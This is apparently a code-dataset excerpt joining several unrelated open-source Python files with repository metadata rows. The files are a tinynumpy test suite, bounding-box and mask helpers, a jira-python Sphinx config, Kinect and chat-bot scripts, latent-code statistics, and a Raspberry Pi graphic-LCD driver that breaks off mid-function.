# Copyright (c) 2014, Almar Klein and Wade Brainerd
# tinynumpy is distributed under the terms of the MIT License.
""" Test suite for tinynumpy
"""
import os
import sys
import ctypes
import pytest
from _pytest import runner
from pytest import raises, skip
import tinynumpy as tnp
# Numpy is optional. If not available, will compare against ourselves.
try:
import numpy as np
except ImportError:
np = tnp
def test_TESTING_WITH_NUMPY():
    """Marker test: skipped when real numpy is unavailable, so the test
    report shows whether the suite compared tinynumpy against numpy or
    only against itself (np is aliased to tnp in that case)."""
    # So we can see in the result whether numpy was used
    if np is None or np is tnp:
        skip('Numpy is not available')
def test_shapes_and_strides():
for shape in [(9, ), (109, ),
(9, 4), (109, 104),
(9, 4, 5), (109, 104, 105),
(9, 4, 5, 6), # not (109, 104, 105, 106) -> too big
]:
# Test shape and strides
a = np.empty(shape)
b = tnp.empty(shape)
assert a.ndim == len(shape)
assert a.ndim == b.ndim
assert a.shape == b.shape
assert a.strides == b.strides
assert a.size == b.size
# Also test repr length
if b.size > 100:
assert len(repr(b)) < 80
else:
assert len(repr(b)) > (b.size * 3) # "x.0" for each element
def test_repr():
for dtype in ['float32', 'int32']:
for data in [[1, 2, 3, 4, 5, 6, 7, 8],
[[1, 2], [3, 4], [5, 6], [7, 8]],
[[[1, 2], [3, 4]],[[5, 6], [7, 8]]],
]:
a = np.array(data, dtype)
b = tnp.array(data, dtype)
# Compare line by line (forget leading whitespace)
charscompared = 0
for l1, l2 in zip(repr(a).splitlines(), repr(b).splitlines()):
l1, l2 = l1.rstrip(), l2.rstrip()
l1, l2 = l1.split('dtype=')[0], l2.split('dtype=')[0]
assert l1 == l2
charscompared += len(l1)
assert charscompared > (3 * b.size)
def test_dtype():
for shape in [(9, ), (9, 4), (9, 4, 5)]:
for dtype in ['bool', 'int8', 'uint8', 'int16', 'uint16',
'int32', 'uint32', 'float32', 'float64']:
a = np.empty(shape, dtype=dtype)
b = tnp.empty(shape, dtype=dtype)
assert a.shape == b.shape
assert a.dtype == b.dtype
assert a.itemsize == b.itemsize
raises(TypeError, tnp.zeros, (9, ), 'blaa')
assert tnp.array([1.0, 2.0]).dtype == 'float64'
assert tnp.array([1, 2]).dtype == 'int64'
def test_reshape():
a = np.array([1, 2, 3, 4, 5, 6, 7, 8])
b = tnp.array([1, 2, 3, 4, 5, 6, 7, 8])
for shape in [(2, 4), (4, 2), (2, 2, 2), (8,)]:
a.shape = shape
b.shape = shape
assert a.shape == b.shape
assert a.strides == b.strides
a.shape = 2, 4
b.shape = 2, 4
# Test transpose
assert b.T.shape == (4, 2)
assert (a.T == b.T).all()
assert (b.T.T == b).all()
# Make non-contiguous versions
a2 = a[:, 2:]
b2 = b[:, 2:]
# Test contiguous flag
assert a.flags['C_CONTIGUOUS']
assert not a2.flags['C_CONTIGUOUS']
# Test base
assert a2.base is a
assert b2.base is b
assert a2[:].base is a
assert b2[:].base is b
# Fail
with raises(ValueError): # Invalid shape
a.shape = (3, 3)
with raises(ValueError):
b.shape = (3, 3)
with raises(AttributeError): # Cannot reshape non-contiguous arrays
a2.shape = 4,
with raises(AttributeError):
b2.shape = 4,
def test_from_and_to_numpy():
# This also tests __array_interface__
for dtype in ['float32', 'float64', 'int32', 'uint32', 'uint8', 'int8']:
for data in [[1, 2, 3, 4, 5, 6, 7, 8],
[[1, 2], [3, 4], [5, 6], [7, 8]],
[[[1, 2], [3, 4]],[[5, 6], [7, 8]]],
]:
# Convert from numpy, from tinynumpy, to numpy
a1 = np.array(data, dtype)
b1 = tnp.array(a1)
b2 = tnp.array(b1)
a2 = np.array(b2)
# Check if its the same
for c in [b1, b2, a2]:
assert a1.shape == c.shape
assert a1.dtype == c.dtype
assert a1.strides == c.strides
assert (a1 == c).all()
# Also test using a numpy array as a buffer
a = np.array([[1, 2], [3, 4], [5, 6], [7, 8]], 'float32')
b = tnp.ndarray(a.shape, a.dtype, strides=a.strides, buffer=a.ravel())
assert (a==b).all()
# Test that is indeed same data
a[0, 0] = 99
assert (a==b).all()
def test_from_ctypes():
for type, dtype in [(ctypes.c_int16, 'int16'),
(ctypes.c_uint8, 'uint8'),
(ctypes.c_float, 'float32'),
(ctypes.c_double, 'float64')]:
# Create ctypes array, possibly something that we get from a c lib
buffer = (type*100)()
# Create array!
b = tnp.ndarray((4, 25), dtype, buffer=buffer)
# Check that we can turn it into a numpy array
a = np.array(b, copy=False)
assert (a == b).all()
assert a.dtype == dtype
# Verify that both point to the same data
assert a.__array_interface__['data'][0] == ctypes.addressof(buffer)
assert b.__array_interface__['data'][0] == ctypes.addressof(buffer)
# also verify offset in __array_interface__ here
for a0, b0 in zip([a[2:], a[:, 10::2], a[1::2, 10:20:2]],
[b[2:], b[:, 10::2], b[1::2, 10:20:2]]):
pa = a0.__array_interface__['data'][0]
pb = b0.__array_interface__['data'][0]
assert pa > ctypes.addressof(buffer)
assert pa == pb
def test_from_bytes():
skip('Need ndarray.frombytes or something')
# Create bytes
buffer = b'x' * 100
# Create array!
b = tnp.ndarray((4, 25), 'uint8', buffer=buffer)
ptr = ctypes.cast(buffer, ctypes.c_void_p).value
# Check that we can turn it into a numpy array
a = np.array(b, copy=False)
assert (a == b).all()
# Verify readonly
with raises(Exception):
a[0, 0] = 1
with raises(Exception):
b[0, 0] = 1
# Verify that both point to the same data
assert a.__array_interface__['data'][0] == ptr
assert b.__array_interface__['data'][0] == ptr
# also verify offset in __array_interface__ here
for a0, b0 in zip([a[2:], a[:, 10::2], a[1::2, 10:20:2]],
[b[2:], b[:, 10::2], b[1::2, 10:20:2]]):
pa = a0.__array_interface__['data'][0]
pb = b0.__array_interface__['data'][0]
assert pa > ptr
assert pa == pb
def test_creating_functions():
    """Smoke-test array creation from a nested list: shape must be inferred
    from the nesting structure."""
    # Test array
    b1 = tnp.array([[1, 2, 3], [4, 5, 6]])
    assert b1.shape == (2, 3)
def test_getitem():
    """Placeholder: constructs matching numpy/tinynumpy arrays but asserts
    nothing yet.

    TODO(review): add indexing assertions comparing a[...] with b[...].
    """
    a = np.array([[1, 2, 3, 4], [5, 6, 7, 8]])
    b = tnp.array([[1, 2, 3, 4], [5, 6, 7, 8]])
if __name__ == '__main__':
# Run tests with or without pytest. Running with pytest creates
# coverage report, running without allows PM debugging to fix bugs.
if False:
del sys.modules['tinynumpy'] # or coverage wont count globals
pytest.main('-v -x --color=yes --cov tinynumpy --cov-config .coveragerc '
'--cov-report html %s' % repr(__file__))
# Run these lines to open coverage report
#import webbrowser
#webbrowser.open_new_tab(os.path.join('htmlcov', 'index.html'))
else:
# Collect function names
test_functions = []
for line in open(__file__, 'rt').readlines():
if line.startswith('def'):
name = line[3:].split('(')[0].strip()
if name.startswith('test_'):
test_functions.append(name)
# Report
print('Collected %i test functions.' % len(test_functions))
# Run
print('\nRunning tests ...\n')
for name in test_functions:
print('Running %s ... ' % name, end='')
func = globals()[name]
try:
func()
except runner.Skipped as err:
print('SKIP:', err)
except Exception:
print('FAIL')
raise
else:
print('OK')
| 30.744604
| 81
| 0.505441
|
4a15b973785a011de465c5f99e5866667daaa034
| 1,149
|
py
|
Python
|
vsc-py-intellisense/dummy_example.py
|
ytingyeu/report-issue-examples
|
41d1cd04bf749d6191d852b546cd1caa660e2bac
|
[
"MIT"
] | null | null | null |
vsc-py-intellisense/dummy_example.py
|
ytingyeu/report-issue-examples
|
41d1cd04bf749d6191d852b546cd1caa660e2bac
|
[
"MIT"
] | null | null | null |
vsc-py-intellisense/dummy_example.py
|
ytingyeu/report-issue-examples
|
41d1cd04bf749d6191d852b546cd1caa660e2bac
|
[
"MIT"
] | null | null | null |
class ClassA(object):
    """Trivial client that exposes a fixed display name."""

    def __init__(self):
        self._name = "Class A"

    def get_name(self):
        """Return this client's display name."""
        return self._name


class ClassB(object):
    """Trivial client that exposes a fixed display name."""

    def __init__(self):
        self._name = "Class B"

    def get_name(self):
        """Return this client's display name."""
        return self._name


class ClientsFactory(object):
    """Facade over a ClassRoot that hands out typed client accessors."""

    def __init__(self, root):
        self._root = root

    def get_class_a(self):
        """Return the (cached) ClassA client."""
        return self._root._get_client('class.a')

    def get_class_b(self):
        """Return the (cached) ClassB client."""
        return self._root._get_client('class.b')


class ClassRoot(object):
    """Owns client instances, constructing each client type at most once."""

    def __init__(self):
        self.clients = ClientsFactory(self)
        self._cache = {}

    def _get_client(self, client_type):
        # Lazily instantiate and memoise exactly one client per type key.
        try:
            return self._cache[client_type]
        except KeyError:
            client = self._get_instance(client_type)
            self._cache[client_type] = client
            return client

    def _get_instance(self, client_class):
        # Dispatch on the type key; unknown keys fall through to None.
        if client_class == "class.a":
            return ClassA()
        if client_class == "class.b":
            return ClassB()
root = ClassRoot()
a = root.clients.get_class_a()
# Not able to list function get_name() with variable a
# but the function does work
print(a.get_name())
| 22.096154
| 70
| 0.633594
|
4a15b9754ffc0b57ba9bb551459b57c01c589cda
| 1,614
|
py
|
Python
|
utils/box_utils.py
|
mikito0011/Chainer_Mask_R-CNN
|
315a5b09897801c1f6f21270aa898dc2c4d96c65
|
[
"BSD-3-Clause"
] | 153
|
2018-01-17T02:24:44.000Z
|
2021-05-23T06:27:30.000Z
|
utils/box_utils.py
|
mikito0011/Chainer_Mask_R-CNN
|
315a5b09897801c1f6f21270aa898dc2c4d96c65
|
[
"BSD-3-Clause"
] | 2
|
2018-01-23T20:26:01.000Z
|
2018-06-16T01:38:43.000Z
|
utils/box_utils.py
|
mikito0011/Chainer_Mask_R-CNN
|
315a5b09897801c1f6f21270aa898dc2c4d96c65
|
[
"BSD-3-Clause"
] | 31
|
2018-01-17T07:01:33.000Z
|
2020-12-09T20:02:35.000Z
|
import numpy as np
import cupy
import cv2
def resize_bbox(bbox, in_size, out_size):
    """Rescale boxes from *in_size* to *out_size*, converting layout.

    Args:
        bbox: (N, 4) array in (x_min, y_min, width, height) order.
        in_size: source image size as (height, width).
        out_size: target image size as (height, width).

    Returns:
        A new (N, 4) array in (y_min, x_min, y_max, x_max) order, scaled
        to *out_size*. The input array is left untouched.
    """
    scale_y = float(out_size[0]) / in_size[0]
    scale_x = float(out_size[1]) / in_size[1]
    resized = bbox.copy()
    resized[:, 0] = scale_y * bbox[:, 1]
    resized[:, 1] = scale_x * bbox[:, 0]
    resized[:, 2] = scale_y * (bbox[:, 1] + bbox[:, 3])
    resized[:, 3] = scale_x * (bbox[:, 0] + bbox[:, 2])
    return resized
def bbox_yxyx2xywh(bbox):
bbox_o = bbox.copy()
bbox_o[:, 0] = bbox[:, 1]
bbox_o[:, 2] = bbox[:, 3] - bbox[:, 1]
bbox_o[:, 1] = bbox[:, 0]
bbox_o[:, 3] = bbox[:, 2] - bbox[:, 0]
return bbox_o
def im_mask(mask, size, bbox):
    """Paste a fixed-size mask prediction into a full-image binary mask.

    Args:
        mask: square float mask of shape (masksize, masksize) — presumably
            probabilities in [0, 1]; rounded to {0, 1} on output (confirm).
        size: (height, width) of the target image.
        bbox: one box in (y_min, x_min, y_max, x_max) order; already
            clipped to the image bounds by the caller.

    Returns:
        uint8 array of shape ``size`` with the resized, binarised mask
        pasted at the (slightly extended) box location.
    """
    # bboxes are already clipped to [0, w], [0, h]
    masksize = mask.shape[0]
    # pad the mask to avoid cv2.resize artifacts
    pmask = np.zeros((masksize + 2, masksize + 2), dtype=np.float32)
    pmask[1:-1, 1:-1] = mask
    # extend the boxhead
    # Grow the box about its centre by the same ratio as the padding, so
    # the padded border maps just outside the original box.
    scale = (masksize + 2) / masksize
    ex_w = (bbox[3] - bbox[1]) * scale
    ex_h = (bbox[2] - bbox[0]) * scale
    ex_x0 = (bbox[3] + bbox[1] - ex_w) / 2
    ex_y0 = (bbox[2] + bbox[0] - ex_h) / 2
    ex_x1 = (bbox[3] + bbox[1] + ex_w) / 2
    ex_y1 = (bbox[2] + bbox[0] + ex_h) / 2
    ex_bbox = np.asarray([ex_y0, ex_x0, ex_y1, ex_x1], dtype=np.int32)
    # whole-image-sized mask
    immask = np.zeros((size[0],size[1]), dtype=np.uint8)
    # Clip the extended box to the image before resizing and pasting.
    x0, x1 = max(ex_bbox[1], 0), min(ex_bbox[3] + 1, size[1])
    y0, y1= max(ex_bbox[0], 0), min(ex_bbox[2] + 1, size[0])
    immask_roi = cv2.resize(pmask, (x1 - x0, y1 - y0))
    immask[y0:y1, x0:x1] = np.round(immask_roi).astype(np.uint8)
    return immask
| 35.866667
| 70
| 0.566914
|
4a15bb234e1662e77a4cd7fe508ac5295d778427
| 8,333
|
py
|
Python
|
docs/conf.py
|
hibellm/jira
|
bf935b4ede4c2b7cc36f8e1d779a60e602319d85
|
[
"BSD-2-Clause"
] | null | null | null |
docs/conf.py
|
hibellm/jira
|
bf935b4ede4c2b7cc36f8e1d779a60e602319d85
|
[
"BSD-2-Clause"
] | null | null | null |
docs/conf.py
|
hibellm/jira
|
bf935b4ede4c2b7cc36f8e1d779a60e602319d85
|
[
"BSD-2-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# JIRA Python Client documentation build configuration file, created by
# sphinx-quickstart on Thu May 3 17:01:50 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import os
import sphinx_rtd_theme
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))
from jira import __version__ # noqa
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.viewcode',
'sphinx.ext.intersphinx']
intersphinx_mapping = {
'python': ('https://docs.python.org/3.5', None),
'requests': ('http://docs.python-requests.org/en/latest/', None),
'requests-oauthlib': ('https://requests-oauthlib.readthedocs.io/en/latest/', None),
'ipython': ('http://ipython.readthedocs.io/en/stable/', None),
'pip': ('http://pip.readthedocs.io/en/stable/', None), }
autodoc_default_flags = ['members', 'undoc-members', 'show-inheritance']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'jira-python'
copyright = u'2012, Atlassian Pty Ltd.'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
# language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
# html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
html_split_index = False
# If true, links to the reST sources are added to the pages.
html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'jirapythondoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
'papersize': 'a4paper',
'pointsize': '10pt'}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'jirapython.tex', u'jira-python Documentation',
u'Atlassian Pty Ltd.', 'manual')]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'jirapython', u'jira-python Documentation',
[u'Atlassian Pty Ltd.'], 1)]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'jirapython', u'jira-python Documentation',
u'Atlassian Pty Ltd.', 'jirapython', 'One line description of project.',
'Miscellaneous')]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
| 33.465863
| 87
| 0.712348
|
4a15bbe930d51d4d2c54f378606042f2867ed185
| 862
|
py
|
Python
|
navigation/deprecated/kinect_test.py
|
ryanmccartney/Autonomous_Electric_Wheelchair
|
0e599de8ed9bba024e729b2286afb48146a350f5
|
[
"MIT"
] | 3
|
2020-08-07T07:28:17.000Z
|
2021-08-02T21:38:42.000Z
|
navigation/deprecated/kinect_test.py
|
ryanmccartney/Autonomous_Electric_Wheelchair
|
0e599de8ed9bba024e729b2286afb48146a350f5
|
[
"MIT"
] | null | null | null |
navigation/deprecated/kinect_test.py
|
ryanmccartney/Autonomous_Electric_Wheelchair
|
0e599de8ed9bba024e729b2286afb48146a350f5
|
[
"MIT"
] | 1
|
2019-05-17T14:15:31.000Z
|
2019-05-17T14:15:31.000Z
|
#import the necessary modules
import freenect
import cv2
import numpy as np
#function to get RGB image from kinect
def get_video():
    """Grab one RGB frame from the Kinect and return it converted to BGR
    channel order (what OpenCV's imshow expects)."""
    array,_ = freenect.sync_get_video()
    array = cv2.cvtColor(array,cv2.COLOR_RGB2BGR)
    return array
#function to get depth image from kinect
def get_depth():
    """Grab one depth frame from the Kinect as a uint8 array.

    NOTE(review): the raw Kinect depth is wider than 8 bits; astype(uint8)
    keeps only the low byte — fine for on-screen visualisation, but it
    loses range information. Confirm before using for measurement.
    """
    array,_ = freenect.sync_get_depth()
    array = array.astype(np.uint8)
    return array
if __name__ == "__main__":
while 1:
#get a frame from RGB camera
frame = get_video()
#get a frame from depth sensor
depth = get_depth()
#display RGB image
cv2.imshow('RGB image',frame)
#display depth image
cv2.imshow('Depth image',depth)
# quit program when 'esc' key is pressed
k = cv2.waitKey(5) & 0xFF
if k == 27:
break
cv2.destroyAllWindows()
| 23.944444
| 49
| 0.62761
|
4a15bd8b0eda0b0fe3a98bbbc841762a9af520a6
| 418
|
py
|
Python
|
Examples/Basic/ping.py
|
NexInfinite/hivenpy
|
b20c37f68f2526a3455bbcfa1432f430ac1258cb
|
[
"MIT"
] | 9
|
2020-07-30T09:31:28.000Z
|
2021-02-17T13:23:43.000Z
|
Examples/Basic/ping.py
|
NexInfinite/hivenpy
|
b20c37f68f2526a3455bbcfa1432f430ac1258cb
|
[
"MIT"
] | null | null | null |
Examples/Basic/ping.py
|
NexInfinite/hivenpy
|
b20c37f68f2526a3455bbcfa1432f430ac1258cb
|
[
"MIT"
] | 4
|
2020-07-30T18:17:50.000Z
|
2020-08-09T23:49:01.000Z
|
from Hiven.client import Bot, events #import events
bot = Bot("Your Bot Token")
@events.event
def on_message(ctx): # this method gets called when a someone sends a message
    """Reply "pong" whenever a user other than the bot itself sends the
    exact message "ping"."""
    if ctx.author.id != bot.user.id: # checks if author of message is not bot account to prevent spam
        if ctx.message.content == "ping": # checks if message content is "ping"
            ctx.send("pong") # sends "pong"
bot.login()
| 34.833333
| 102
| 0.679426
|
4a15bdda3cb2542ad79ba584452c57bd991463ec
| 1,616
|
py
|
Python
|
trainers/encode_tools.py
|
stormraiser/disunknown
|
194cc01851fe26bc2f0ed87cdcc238c801f4a333
|
[
"MIT"
] | 17
|
2021-09-13T19:47:15.000Z
|
2022-03-18T03:07:55.000Z
|
trainers/encode_tools.py
|
stormraiser/disunknown
|
194cc01851fe26bc2f0ed87cdcc238c801f4a333
|
[
"MIT"
] | null | null | null |
trainers/encode_tools.py
|
stormraiser/disunknown
|
194cc01851fe26bc2f0ed87cdcc238c801f4a333
|
[
"MIT"
] | 2
|
2022-01-31T02:31:11.000Z
|
2022-03-18T03:07:48.000Z
|
import math
import torch
def run_encoder(dataloader, encoder, device):
    """Run *encoder* over every batch from *dataloader* without gradients.

    Batches may be bare image tensors or [image, label] pairs. For each
    encoder output head, the per-sample tuple of tensors is stacked along
    dim 1, moved to CPU, and concatenated over all batches.

    Returns the list of per-head tensors, or (outputs, labels) when the
    dataloader yielded labels.
    """
    per_head_chunks = None
    labels = []
    with torch.no_grad():
        for batch in dataloader:
            if isinstance(batch, list):
                images, batch_labels = batch
                labels.append(batch_labels)
            else:
                images = batch
            encoded = encoder(images.to(device))
            stacked = [torch.stack(parts, 1).cpu() for parts in encoded]
            if per_head_chunks is None:
                per_head_chunks = [[chunk] for chunk in stacked]
            else:
                for chunks, chunk in zip(per_head_chunks, stacked):
                    chunks.append(chunk)
    merged = [torch.cat(chunks, 0) for chunks in per_head_chunks]
    if labels:
        return merged, torch.cat(labels, 0)
    return merged
def get_code_stats(code, device):
    """Compute summary statistics over encoder latent codes.

    Args:
        code: tensor of shape (n, 2, m) where code[:, 0] holds per-sample
            means and code[:, 1] per-sample standard deviations of an
            m-dimensional code — assumes the (mean, std) layout produced
            by run_encoder's stack along dim 1; confirm with callers.
        device: device used for the (chunked) accumulation passes.

    Returns:
        dict of float32 tensors: 'mean', 'std' (total per-dim std),
        'var_ratio' (fraction of variance carried by the means), and
        'eigval'/'eigvec' from the normalized covariance of the means.
    """
    code = code.to(torch.float64).to(device)
    n = code.size(0)
    m = code.size(2)
    # Streaming accumulators: sum of means, sum of mean outer products,
    # and sum of per-sample variances (std squared).
    s = torch.zeros(m, dtype = torch.float64, device = device)
    sxy = torch.zeros(m, m, dtype = torch.float64, device = device)
    sv = torch.zeros(m, dtype = torch.float64, device = device)
    for code_batch in code.split(1024):
        mean, std = code_batch.unbind(1)
        s.add_(mean.sum(0))
        sxy.add_(mean.t() @ mean)
        sv.add_(std.pow(2).sum(0))
    ex = s.cpu() / n
    # Biased covariance of the means: E[xy] - E[x]E[y].
    cov = sxy.cpu() / n - ex.unsqueeze(0) * ex.unsqueeze(1)
    ev = sv.cpu() / n
    # Law of total variance: full variance = Var(mean) + E[std^2].
    full_var = torch.diag(cov) + ev
    full_std = full_var.sqrt()
    var_ratio = torch.diag(cov) / full_var
    # Correlation-like matrix of the means, normalized by total std.
    normalized_cov = cov / (full_std.unsqueeze(0) * full_std.unsqueeze(1))
    eigval, eigvec = torch.linalg.eigh(normalized_cov)
    stats = {
        'mean': ex.to(torch.float32),
        'std': full_std.to(torch.float32),
        'var_ratio': var_ratio.to(torch.float32),
        'eigval': eigval.to(torch.float32),
        'eigvec': eigvec.to(torch.float32)
    }
    return stats
| 28.350877
| 71
| 0.67203
|
4a15be7e8e0258b1aaec092fa83aeeef3b189faa
| 7,110
|
py
|
Python
|
hexa-beta/GLCD.py
|
projecthexa/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | 7
|
2018-09-12T18:53:24.000Z
|
2021-01-04T04:21:36.000Z
|
hexa-beta/GLCD.py
|
SahajKhandelwal/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | null | null | null |
hexa-beta/GLCD.py
|
SahajKhandelwal/hexa
|
d3ad27283903bf895c70a4f8aee2c0f899b0c797
|
[
"MIT"
] | 3
|
2018-05-24T22:16:37.000Z
|
2019-03-14T10:05:42.000Z
|
__author__ = 'karthi'
import time
import RPi.GPIO as GPIO
import fonts
fontWidth = 6
currentScreen = 0
class LCD_GPIO(object):
    """Low-level bit-banged driver for a dual-controller 128x64 graphic LCD
    wired to Raspberry Pi GPIO pins (BCM numbering).

    Drives the 8-bit parallel data bus D0-D7 plus control lines RS, RW,
    E1/E2 (enable per controller), CS1/CS2 (chip select) and RST.
    """
    # Timing constants
    E_PULSE = 0.000000070 # Addess setup time 140ns
    E_DELAY = 0.000000100 # Data setup time 200ns
    def __init__(self, RST,RS,RW,E1,E2,CS1,CS2, D0, D1, D2, D3, D4, D5, D6, D7):
        """Store the pin map, configure every pin as an output, and pulse
        RST low/high to hardware-reset the display."""
        #GPIO number Assignment
        self.CS1=CS1
        self.CS2=CS2
        self.RST=RST
        self.E1 = E1
        self.E2 = E2
        self.RS = RS
        self.RW = RW
        self.D0 = D0
        self.D1 = D1
        self.D2 = D2
        self.D3 = D3
        self.D4 = D4
        self.D5 = D5
        self.D6 = D6
        self.D7 = D7
        GPIO.setmode(GPIO.BCM) # Use BCM GPIO numbers
        GPIO.setup(self.E1, GPIO.OUT) # E1
        GPIO.setup(self.E2, GPIO.OUT) # E2
        GPIO.setup(self.RW, GPIO.OUT) # RW
        GPIO.setup(self.RS, GPIO.OUT) # RS
        GPIO.setup(self.D0, GPIO.OUT) # DB0
        GPIO.setup(self.D1, GPIO.OUT) # DB1
        GPIO.setup(self.D2, GPIO.OUT) # DB2
        GPIO.setup(self.D3, GPIO.OUT) # DB3
        GPIO.setup(self.D4, GPIO.OUT) # DB4
        GPIO.setup(self.D5, GPIO.OUT) # DB5
        GPIO.setup(self.D6, GPIO.OUT) # DB6
        GPIO.setup(self.D7, GPIO.OUT) # DB7
        GPIO.setup(self.CS1, GPIO.OUT) # CS1
        GPIO.setup(self.CS2, GPIO.OUT) # CS2
        # Drive all control lines low before the reset pulse.
        GPIO.output(self.RS, 0)
        GPIO.output(self.RW, 0)
        GPIO.output(self.E1, 0)
        GPIO.output(self.E2, 0)
        GPIO.output(self.CS1, 0)
        GPIO.output(self.CS2, 0)
        GPIO.setup(self.RST, GPIO.OUT) # RST
        # Hardware reset: hold RST low, release, then wait for power-up.
        GPIO.output(self.RST, 0)
        time.sleep(0.5)
        GPIO.output(self.RST, 1)
        time.sleep(0.03)
    def useDisp1(self):
        """Select controller 1 via the chip-select lines."""
        # use Controller 1 (Display's LEFT part)
        GPIO.output(self.CS1, 1)
        GPIO.output(self.CS2, 0)
    def useDisp2(self):
        """Select controller 2 via the chip-select lines."""
        # use Controller 2 (Display's RIGHT part)
        GPIO.output(self.CS1, 0)
        GPIO.output(self.CS2, 1)
    def lcd_byte(self,value, mode):
        """Write one byte onto the data bus and latch it by pulsing E1/E2.

        `mode` is driven onto RS (0 = command, 1 = data).

        NOTE(review): callers in this file only pass mode 0 or 1, so the
        ``mode == 19`` branch (which inverts the data lines) is never
        reached — looks like dead or debug code; confirm before removing.
        """
        GPIO.output(self.RW,0)
        GPIO.output(self.RS,mode)
        if (mode == 19):
            GPIO.output(self.D0, (~(value)) & 0x01)
            GPIO.output(self.D1, (~(value)) & 0x02)
            GPIO.output(self.D2, (~(value)) & 0x04)
            GPIO.output(self.D3, (~(value)) & 0x08)
            GPIO.output(self.D4, (~(value)) & 0x10)
            GPIO.output(self.D5, (~(value)) & 0x20)
            GPIO.output(self.D6, (~(value)) & 0x40)
            GPIO.output(self.D7, (~(value)) & 0x80)
        else:
            GPIO.output(self.D0, (value) & 0x01)
            GPIO.output(self.D1, (value) & 0x02)
            GPIO.output(self.D2, (value) & 0x04)
            GPIO.output(self.D3, (value) & 0x08)
            GPIO.output(self.D4, (value) & 0x10)
            GPIO.output(self.D5, (value) & 0x20)
            GPIO.output(self.D6, (value) & 0x40)
            GPIO.output(self.D7, (value) & 0x80)
        # Toggle E
        # NOTE(review): both enable lines are pulsed together regardless of
        # currentScreen; the per-screen branches below were disabled.
        if True:#(currentScreen == 0):
            # print("cs0"+",,,"+str(currentScreen))
            time.sleep(self.E_DELAY)
